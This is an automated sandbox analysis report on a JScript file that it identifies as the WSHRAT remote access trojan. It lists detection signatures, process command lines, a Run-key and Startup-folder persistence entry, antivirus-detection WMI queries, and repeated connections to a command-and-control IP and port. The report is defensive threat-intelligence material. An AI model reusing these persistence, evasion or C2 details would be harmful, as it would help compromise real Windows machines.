Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RBI-MontaryFramework.js

Overview

General Information

Sample name:RBI-MontaryFramework.js
Analysis ID:1583511
MD5:849f2d707a526a4bb7273208ed236c95
SHA1:897c39a63e1aedeed75bc7ec29594faaee1b811c
SHA256:c45a0f9a9ca74ab24a212c457547f93b4f16fa4e35c4f2667865bd6359491dd2
Infos:

Detection

WSHRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Sigma detected: Drops script at startup location
Sigma detected: Register Wscript In Run Key
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected WSHRAT
Creates autostart registry keys with suspicious names
Drops script or batch files to the startup folder
JavaScript source code contains functionality to check for AV products
JavaScript source code contains functionality to check for volume information
JavaScript source code contains functionality to compute date of execution (likely for evasion)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • wscript.exe (PID: 7348 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 7672 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7840 cmdline: "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7920 cmdline: "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7988 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Houdini, WSHRATHoudini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.houdini
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_WSHRATYara detected WSHRATJoe Security

    System Summary

    barindex
    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 154.216.18.17, DestinationIsIpv6: false, DestinationPort: 7181, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7672, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49954
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js", ProcessId: 7348, ProcessName: wscript.exe
    Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7348, TargetFilename: C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 154.216.18.17, DestinationIsIpv6: false, DestinationPort: 7181, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7672, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49954
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js", ProcessId: 7348, ProcessName: wscript.exe

    Data Obfuscation

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7348, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js

    Persistence and Installation Behavior

    barindex
    Source: Registry Key setAuthor: Joe Security: Data: Details: WScript.exe //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 7348, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RBI-MontaryFramework
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-02T22:38:17.078458+010020179941Malware Command and Control Activity Detected192.168.2.449954154.216.18.177181TCP
    2025-01-02T22:38:25.048305+010020179941Malware Command and Control Activity Detected192.168.2.450004154.216.18.177181TCP
    2025-01-02T22:38:32.124707+010020179941Malware Command and Control Activity Detected192.168.2.450005154.216.18.177181TCP
    2025-01-02T22:38:39.110742+010020179941Malware Command and Control Activity Detected192.168.2.450006154.216.18.177181TCP
    2025-01-02T22:38:46.063218+010020179941Malware Command and Control Activity Detected192.168.2.450007154.216.18.177181TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-02T22:38:17.078458+010020175161Malware Command and Control Activity Detected192.168.2.449954154.216.18.177181TCP
    2025-01-02T22:38:25.048305+010020175161Malware Command and Control Activity Detected192.168.2.450004154.216.18.177181TCP
    2025-01-02T22:38:32.124707+010020175161Malware Command and Control Activity Detected192.168.2.450005154.216.18.177181TCP
    2025-01-02T22:38:39.110742+010020175161Malware Command and Control Activity Detected192.168.2.450006154.216.18.177181TCP
    2025-01-02T22:38:46.063218+010020175161Malware Command and Control Activity Detected192.168.2.450007154.216.18.177181TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: RBI-MontaryFramework.jsReturn value : ['"select * from antivirusPr","o"', '"select * from antivirusProd"', '"select * from antivirusProduc"', '"select * from antivirusP"', '"select * from antivirusPro"', '"select * from antivirusProdu","c"', '"select * from antivirusPr"', '"select * from antivirusProduct",""', '"select * from antivirusProduct","wql",0', '"select * from antivirus","P"', '"select * from antivirusPro","d"', '"select * from antivirusProdu"', '"select * from antivirusProd","u"', '"select * from antivirusP","r"', '"select * from antivirusProduc","t"', '"select * from antivirus"', '"select * from antivirusProduct"']
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior

    Software Vulnerabilities

    barindex
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"Scripting.FileSystemObject"', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"Scripting.FileSystemObject"', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"Scripting.FileSystemObject"', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
